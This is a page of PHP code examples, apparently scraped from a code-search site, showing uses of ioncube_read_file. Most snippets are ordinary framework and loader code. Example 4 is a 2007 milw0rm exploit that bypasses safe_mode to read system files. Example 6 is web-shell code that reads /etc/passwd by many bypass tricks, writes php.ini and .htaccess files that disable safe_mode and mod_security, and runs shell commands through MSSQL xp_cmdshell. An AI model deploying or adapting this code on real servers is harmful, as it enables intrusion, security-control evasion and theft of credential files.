Exemplo n.º 1
0
 function __construct($data_source, $data_source_type = 'raw', $collapse_dups = 0, $index_numeric = 0)
 {
     $this->collapse_dups = $collapse_dups;
     $this->index_numeric = $index_numeric;
     $this->data = '';
     if ($data_source_type == 'raw') {
         $this->data = $data_source;
     } elseif ($data_source_type == 'stream') {
         while (!feof($data_source)) {
             $this->data .= fread($data_source, 1000);
         }
         // try filename, then if that fails...
     } elseif (file_exists($data_source)) {
         $this->data = implode('', file($data_source));
     } else {
         // try url
         $fp = fopen($data_source, 'r');
         while (!feof($fp)) {
             $this->data .= fread($fp, 1000);
         }
         fclose($fp);
     }
     //add support for load encoded files
     if (function_exists("ioncube_read_file")) {
         $data = ioncube_read_file($data_source);
         if (!is_int($data)) {
             $this->data = $data;
         }
     } elseif (substr($this->data, 0, 7) == '!odMbo!') {
         header("Location: " . OPENBIZ_APP_INDEX_URL . '/common/loader_not_installed');
         exit;
     }
 }
 public function getContent(Smarty_Template_Source $source)
 {
     if ($source->timestamp) {
         if (function_exists('ioncube_read_file')) {
             return ioncube_read_file($source->filepath);
         } else {
             return file_get_contents($source->filepath);
         }
     }
     if ($source instanceof Smarty_Config_Source) {
         throw new SmartyException("Unable to read config {$source->type} '{$source->name}'");
     }
     throw new SmartyException("Unable to read template {$source->type} '{$source->name}'");
 }
Exemplo n.º 3
0
 /**
  * Construct an instance of an object
  *
  * @param string $objName object name
  * @param array $xmlArr xml array
  * @return object the instance of the object
  */
 protected function constructObject($objName, &$xmlArr = null)
 {
     if (!$xmlArr) {
         $xmlFile = BizSystem::GetXmlFileWithPath($objName);
         if (!$xmlFile) {
             $dotPos = strrpos($objName, ".");
             $package = $dotPos > 0 ? substr($objName, 0, $dotPos) : null;
             $class = $dotPos > 0 ? substr($objName, $dotPos + 1) : $objName;
         } else {
             $xmlArr = BizSystem::getXmlArray($xmlFile);
         }
     }
     if ($xmlArr) {
         $keys = array_keys($xmlArr);
         $root = $keys[0];
         // add by mr_a_ton , atrubut name must match with object name
         $dotPos = strrpos($objName, ".");
         $shortObjectName = $dotPos > 0 ? substr($objName, $dotPos + 1) : $objName;
         if ($xmlArr[$root]["ATTRIBUTES"]["NAME"] == "") {
             $xmlArr[$root]["ATTRIBUTES"]["NAME"] = $shortObjectName;
         } else {
             if ($shortObjectName != $xmlArr[$root]["ATTRIBUTES"]["NAME"]) {
                 trigger_error("Metadata file parsing error for object {$objName}. Name attribut [" . $xmlArr[$root]["ATTRIBUTES"]["NAME"] . "] not same with object name. Please double check your metadata xml file again.", E_USER_ERROR);
             }
         }
         //$package = $xmlArr[$root]["ATTRIBUTES"]["PACKAGE"];
         $class = $xmlArr[$root]["ATTRIBUTES"]["CLASS"];
         // if class has package name as prefix, change the package to the prefix
         $dotPos = strrpos($class, ".");
         $classPrefix = $dotPos > 0 ? substr($class, 0, $dotPos) : null;
         $classPackage = $classPrefix ? $classPrefix : null;
         if ($classPrefix) {
             $class = substr($class, $dotPos + 1);
         }
         // set object package
         $dotPos = strrpos($objName, ".");
         $package = $dotPos > 0 ? substr($objName, 0, $dotPos) : null;
         if (strpos($package, '@') === 0) {
             $package = substr($package, 1);
         }
         if (!$classPackage) {
             $classPackage = $package;
         }
         $xmlArr[$root]["ATTRIBUTES"]["PACKAGE"] = $package;
     }
     if ($class == "BizObj") {
         // convert BizObj to BizDataObj, support <1.2 version
         $class = "BizDataObj";
     }
     if (!class_exists($class, false)) {
         $classFile = BizClassLoader::getLibFileWithPath($class, $classPackage);
         if (!$classFile) {
             if ($package) {
                 trigger_error("Cannot find the class with name as {$package}.{$class}", E_USER_ERROR);
             } else {
                 trigger_error("Cannot find the class with name as {$class} of {$objName}", E_USER_ERROR);
             }
             exit;
         }
         include_once $classFile;
     }
     if (class_exists($class, false)) {
         //if ($objName == "collab.calendar.form.EventListForm") { print_r($xmlArr); exit; }
         $obj_ref = new $class($xmlArr);
         if ($obj_ref) {
             return $obj_ref;
         }
     } else {
         if (function_exists("ioncube_read_file")) {
             $data = ioncube_read_file($classFile);
             if (!strpos($data, "ionCube Loader")) {
                 trigger_error("Cannot find the class with name as {$class} in {$classFile}", E_USER_ERROR);
             } else {
             }
         }
     }
     return null;
 }
Exemplo n.º 4
0
//mail: shinnai[at]autistici[dot]org
//site: http://shinnai.altervista.org
//Tested on xp Pro sp2 full patched, worked both from the cli and on apache
//Technical details:
//ionCube version: 6.5
//extension: ioncube_loader_win_5.2.dll (other may also be vulnerable)
//url: www.ioncube.com
//php.ini settings:
//safe_mode = On
//disable_functions = ioncube_read_file, readfile
//Description:
//This is useful to obtain juicy informations but also to retrieve source
//code of php pages, password files, etc... you just need to change file path.
//Anyway, don't worry, nobody will read your obfuscated code :)
//greetz to: BlackLight for help me to understand better PHP
//P.S.
//This extension contains even an interesting ioncube_write_file function...
if (!extension_loaded("ionCube Loader")) {
    die("ionCube Loader extension required!");
}
$path = str_repeat("..\\", 20);
$MyBoot_readfile = readfile($path . "windows\\system.ini");
#just to be sure that I set correctely disable_function :)
$MyBoot_ioncube = ioncube_read_file($path . "boot.ini");
echo $MyBoot_readfile;
echo "<br><br>ionCube output:<br><br>";
echo $MyBoot_ioncube;
?>

# milw0rm.com [2007-10-11]
Exemplo n.º 5
0
 /**
  * This will take the passed file and try to
  * work out if it is an encoded/encrypted
  * ioncube file.
  * It dosent test the file exten, as it
  * expects the calling method to have done
  * that before.
  *
  * @param string $filename Filename, with path, to check
  *
  * @return boolean True if file was encoded/encrypted
  */
 private function checkFileCoding($filename)
 {
     // check to see if this is an encrypted file
     $ioncube = ioncube_read_file($filename, $ioncubeType);
     if (is_int($ioncube)) {
         // we got an error from ioncube, so its encrypted
         return true;
     }
     // read first line of file
     $f = fopen($filename, 'r');
     $line = trim(fgets($f, 32));
     fclose($f);
     // if first line is longer than 30, then this isnt a php file
     if (strlen($line) > 30) {
         return false;
     }
     // if first line starts '<?php //0' then we can be pretty certain its encoded
     if (substr($line, 0, 9) == '<?php //0') {
         return true;
     }
     // otherwise its most likley un-encrypted/encoded
     return false;
 }
Exemplo n.º 6
0
function safemodE()
{
    global $windows, $hcwd;
    $file = empty($_REQUEST['file']) ? '/etc/passwd' : $_REQUEST['file'];
    $pr = "\r\n</font><font color=green>Method ";
    $po = ")</font><font color=#FA0>\r\n";
    $i = 1;
    if (!empty($_REQUEST['read'])) {
        echo "<pre>{$pr}{$i}:(ini_restore{$po}";
        ini_restore('safe_mode');
        ini_restore('open_basedir');
        readfile($file);
        $i++;
        if (checkfunctioN("ioncube_read_file")) {
            echo "{$pr}{$i}:(ionCube{$po}";
            echo ioncube_read_file($file);
            $i++;
        }
        if (checkfunctioN('symlink')) {
            echo "{$pr}{$i}:(symlink{$po}";
            $lnk = whereistmP() . DIRECTORY_SEPARATOR . uniqid('lnk_');
            @symlink($file, $lnk);
            @readfile($lnk);
            @unlink($lnk);
            $i++;
        }
        echo "{$pr}{$i}:(include{$po}";
        include $file;
        $i++;
        echo "{$pr}{$i}:(copy{$po}";
        $tmp = tempnam('', 'cx');
        copy('compress.zlib://' . $file, $tmp);
        $fh = fopen($tmp, 'r');
        $data = fread($fh, filesize($tmp));
        fclose($fh);
        echo $data;
        $i++;
        if (checkfunctioN('mb_send_mail')) {
            echo "{$pr}{$i}:(mb_send_mail{$po}";
            if (file_exists('/tmp/mb_send_mail')) {
                unlink('/tmp/mb_send_mail');
            }
            mb_send_mail(NULL, NULL, NULL, NULL, '-C $file -X /tmp/mb_send_mail');
            readfile('/tmp/mb_send_mail');
            $i++;
        }
        if (checkfunctioN('curl_init')) {
            echo "{$pr}{$i}:(curl_init [A]{$po}";
            $fh = curl_init('file://' . $file . '');
            $tmp = curl_exec($fh);
            echo $tmp;
            $i++;
            echo "{$pr}{$i}:(curl_init [B]{$po}";
            $i++;
            if (strstr($file, DIRECTORY_SEPARATOR)) {
                $ch = curl_init('file:///' . $file . "/../../../../../../../../../../../../" . __FILE__);
            } else {
                $ch = curl_init('file://' . $file . "" . __FILE__);
            }
            var_dump(curl_exec($ch));
        }
        if ($windows) {
            echo "{$pr}{$i}:(shell{$po}";
            echo shelL("type \"{$file}\"");
            $i++;
        } else {
            echo "{$pr}{$i}:(shell{$po}";
            echo shelL("cat {$file}");
            $i++;
        }
        if (checkfunctioN('imap_open')) {
            echo "{$pr}{$i}:(imap [A]{$po}";
            $str = imap_open('/etc/passwd', '', '');
            $list = imap_list($str, $file, '*');
            for ($i = 0; $i < count($list); $i++) {
                echo $list[$i] . "\n";
            }
            imap_close($str);
            $i++;
            echo "{$pr}{$i}:(imap [B]{$po}";
            $str = imap_open($file, '', '');
            $tmp = imap_body($str, 1);
            echo $tmp;
            imap_close($str);
            $i++;
        }
        if ($file == '/etc/passwd') {
            echo "{$pr}{$i}:(posix{$po}";
            for ($uid = 0; $uid < 99999; $uid++) {
                $h = posix_getpwuid($uid);
                if (!empty($h)) {
                    foreach ($h as $k => $v) {
                        echo "{$v}";
                        if ($k != 'shell') {
                            echo ":";
                        }
                    }
                    echo "\r\n";
                }
            }
        }
        echo "\n</pre></font>";
    } elseif (!empty($_REQUEST['show'])) {
        echo "<pre>{$pr}{$i}:(glob{$po}";
        $con = glob("{$file}*");
        foreach ($con as $v) {
            echo "{$v}\n";
        }
        $i++;
        if (checkfunctioN('imap_open')) {
            echo "{$pr}{$i}:(imap{$po}";
            $str = imap_open('/etc/passwd', '', '');
            $s = explode("|", $file);
            if (count($s) > 1) {
                $list = imap_list($str, trim($s[0]), trim($s[1]));
            } else {
                $list = imap_list($str, trim($str[0]), '*');
            }
            for ($i = 0; $i < count($list); $i++) {
                echo "{$list[$i]}\r\n";
            }
            imap_close($str);
            $i++;
        }
        if (class_exists('COM')) {
            echo "{$pr}{$i}:(COM{$po}";
            $ws = new COM('WScript.Shell');
            $exec = comshelL("dir \"{$file}\"", $ws);
            $exec = str_replace("\t", '', $exec);
            echo $exec;
            $i++;
        }
        if (checkfunctioN('win_shell_execute')) {
            echo "{$pr}{$i}:(win32std{$po}";
            echo winshelL("dir \"{$file}\"");
            $i++;
        }
        if (checkfunctioN('win32_create_service')) {
            echo "{$pr}{$i}:(win32service{$po}";
            echo srvshelL("dir \"{$file}\"");
        }
        echo "\n</pre></font>";
    } elseif (!empty($_REQUEST['create'])) {
        $i = 1;
        $dir = dirname(__FILE__) . DIRECTORY_SEPARATOR;
        if (is_writable($dir)) {
            echo "<pre>{$pr}{$i}:(php.ini{$po}";
            file_put_contents($dir . 'php.ini', "safe_mode = Off\r\ndisable_functions = NONE\r\nsafe_mode_gid = Off\r\nopen_basedir = Off");
            echo "\nphp.ini created!\n";
            $i++;
            echo "{$pr}{$i}:(ini.ini{$po}";
            file_put_contents($dir . 'ini.ini', "safe_mode = Off\r\ndisable_functions = NONE\r\nsafe_mode_gid = Off\r\nopen_basedir = Off");
            echo "\nini.ini created!\n";
            $i++;
            echo "{$pr}{$i}:(.htaccess{$po}";
            file_put_contents($dir . '.htaccess', "<IfModule mod_security.c>\r\nSecFilterEngine Off\r\nSecFilterScanPOST Off\r\nSecFilterCheckCookieFormat Off\r\nSecFilterNormalizeCookies Off\r\nSecFilterCheckURLEncoding Off\r\nSecFilterCheckUnicodeEncoding Off\r\n</IfModule>");
            echo "\n.htaccess created!\n";
            echo "\nCheck if safe-mode is off.\n</pre></font>";
        } else {
            echo "Local directory is not writable!";
        }
    } elseif (!empty($_REQUEST['sql'])) {
        $ta = uniqid('N');
        $s = array("CREATE TEMPORARY TABLE {$ta} (file LONGBLOB)", "LOAD DATA INFILE '" . addslashes($_REQUEST['file']) . "' INTO TABLE {$ta}", "SELECT * FROM {$ta}");
        $l = mysql_connect('localhost', $_REQUEST['user'], $_REQUEST['pass']);
        mysql_select_db($_REQUEST['db'], $l);
        echo '<pre><font color=#FA0>';
        foreach ($s as $v) {
            $q = mysql_query($v, $l);
            while ($d = mysql_fetch_row($q)) {
                echo htmlspecialchars($d[0]);
            }
        }
        echo '</pre></font>';
    } elseif (!empty($_REQUEST['serveR']) && !empty($_REQUEST['coM']) && !empty($_REQUEST['dB']) && !empty($_REQUEST['useR']) && isset($_REQUEST['pasS'])) {
        $res = '';
        $tb = uniqid('NJ');
        $db = mssql_connect($_REQUEST['serveR'], $_REQUEST['useR'], $_REQUEST['pasS']);
        mssql_select_db($_REQUEST['dB'], $db);
        mssql_query("create table {$tb} ( string VARCHAR (500) NULL)", $db);
        mssql_query("insert into {$tb} EXEC master.dbo.xp_cmdshell '" . $_REQUEST['coM'] . "'", $db);
        $re = mssql_query("select * from {$tb}", $db);
        while ($row = mssql_fetch_row($re)) {
            $res .= $row[0] . "\r\n";
        }
        mssql_query("drop table {$tb}", $db);
        mssql_close($db);
        echo "<div align=center><textarea rows='18' cols='64'>{$res}</textarea></div><br>";
    }
    $f = !empty($_REQUEST['file']) ? htmlspecialchars($_REQUEST['file']) : '/etc/passwd';
    $u = !empty($_REQUEST['user']) ? htmlspecialchars($_REQUEST['user']) : 'root';
    $p = !empty($_REQUEST['pass']) ? htmlspecialchars($_REQUEST['pass']) : '123456';
    $d = !empty($_REQUEST['db']) ? htmlspecialchars($_REQUEST['db']) : 'test';
    echo '
<form name="client" method="POST">
<div class="fieldwrapper">
<label class="styled" style="width:320px">Disable safe-mode & mod_sec</label>
</div><div class="fieldwrapper">
<label class="styled">Create config files:</label>
<div class="thefield">
php.ini<br />
ini.ini<br />
.htaccess<br />
</div>
</div>' . $hcwd . '<div class="buttonsdiv">
<input type="submit" name="create" value="Create" style="margin-left: 150px;" />
</div>
</form>
<br />
<form name="client" method="POST">
<div class="fieldwrapper">
<label class="styled" style="width:320px">Use PHP Bugs</label>
</div><div class="fieldwrapper">
<label class="styled">File:</label>
<div class="thefield">
<input type="text" name="file" value="' . $f . '" size="30" />
</div>
</div>' . $hcwd . '<div class="buttonsdiv">
<input type="submit" name="read" value="Read File" style="margin-left: 150px;" />
</div>
<div class="buttonsdiv">
<input type="submit" name="show" value="List directory" style="margin-left: 150px;" />
</div>
</form>
<br />
<form name="client1" method="POST">
<div class="fieldwrapper">
<label class="styled" style="width:320px">Use MySQL</label>
</div><div class="fieldwrapper">
<label class="styled">File:</label>
<div class="thefield">
<input type="text" name="file" value="' . $f . '" size="30" />
</div>
</div><div class="fieldwrapper">
<label class="styled">Username:</label>
<div class="thefield">
<input type="text" name="user" value="' . $u . '" size="30" />
</div>
</div><div class="fieldwrapper">
<label class="styled">Password:</label>
<div class="thefield">
<input type="text" name="pass" value="' . $p . '" size="30" />
</div>
</div><div class="fieldwrapper">
<label class="styled">Database:</label>
<div class="thefield">
<input type="text" name="db" value="' . $d . '" size="30" />
</div>
</div>' . $hcwd . '
<div class="buttonsdiv">
<input type="submit" name="sql" value="Read" style="margin-left: 150px;" />
</div>
</form>
<br />
<form name="client2" method="POST">
<div class="fieldwrapper">
<label class="styled" style="width:320px">MSSQL Exec</label>
</div><div class="fieldwrapper">
<label class="styled">Server:</label>
<div class="thefield">
<input type="text" name="serveR" value="';
    if (!empty($_REQUEST['serveR'])) {
        echo htmlspecialchars($_REQUEST['serveR']);
    } else {
        echo 'localhost';
    }
    echo '" size="30" />
</div>
</div><div class="fieldwrapper">
<label class="styled">Username:</label>
<div class="thefield">
<input type="text" name="useR" value="';
    if (!empty($_REQUEST['useR'])) {
        echo htmlspecialchars($_REQUEST['useR']);
    } else {
        echo 'sa';
    }
    echo '" size="30" />
</div>
</div><div class="fieldwrapper">
<label class="styled">Password:</label>
<div class="thefield">
<input type="text" name="pasS" value="';
    if (!empty($_REQUEST['pasS'])) {
        echo htmlspecialchars($_REQUEST['pasS']);
    }
    echo '" size="30" />
</div>
</div><div class="fieldwrapper">
<label class="styled">Command:</label>
<div class="thefield">
<input type="text" name="coM" value="';
    if (!empty($_REQUEST['coM'])) {
        echo htmlspecialchars($_REQUEST['coM']);
    } else {
        echo 'dir c:';
    }
    echo '" size="30" />
</div>
</div><div class="fieldwrapper">
<label class="styled">Database:</label>
<div class="thefield">
<input type="text" name="dB" value="';
    if (!empty($_REQUEST['dB'])) {
        echo htmlspecialchars($_REQUEST['dB']);
    } else {
        echo 'master';
    }
    echo '" size="30" />
</div>
</div>' . $hcwd . '
<div class="buttonsdiv">
<input type="submit" value="Execute" style="margin-left: 150px;" />
</div>
</form>
';
}
Exemplo n.º 7
0
 /**
  * VQMod::_getMods()
  *
  * @return null
  * @description Gets list of XML files in vqmod xml folder for processing
  */
 private function _getMods()
 {
     $this->_modFileList = $this->_getModFileList();
     foreach ($this->_modFileList as $file) {
         if (file_exists($file)) {
             $lastMod = filemtime($file);
             if ($lastMod > $this->_lastModifiedTime) {
                 $this->_lastModifiedTime = $lastMod;
             }
         }
     }
     $xml_folder_time = filemtime($this->path('ext/vqmod/xml'));
     if ($xml_folder_time > $this->_lastModifiedTime) {
         $this->_lastModifiedTime = $xml_folder_time;
     }
     $modCache = $this->path($this->modCache);
     if ($this->_devMode || !file_exists($modCache)) {
         $this->_lastModifiedTime = time();
     } elseif (file_exists($modCache) && filemtime($modCache) >= $this->_lastModifiedTime) {
         if (function_exists('ioncube_read_file')) {
             $mods = ioncube_read_file($modCache);
             if (is_int($mods)) {
                 $mods = false;
             }
         } else {
             $mods = file_get_contents($modCache);
         }
         if (!empty($mods)) {
             $this->_mods = unserialize($mods);
         }
         if ($this->_mods !== false) {
             return;
         }
     }
     if ($this->_modFileList) {
         $this->_parseMods();
     } else {
         $this->log->write('NO MODS IN USE');
     }
 }
Exemplo n.º 8
0
 function _read_file($filename)
 {
     $res = false;
     if (file_exists($filename)) {
         if (function_exists('ioncube_read_file')) {
             $res = ioncube_read_file($filename);
             if (is_int($res)) {
                 $res = false;
             }
         } else {
             if ($fd = @fopen($filename, 'rb')) {
                 $res = ($size = filesize($filename)) ? fread($fd, $size) : '';
                 fclose($fd);
             }
         }
     }
     return $res;
 }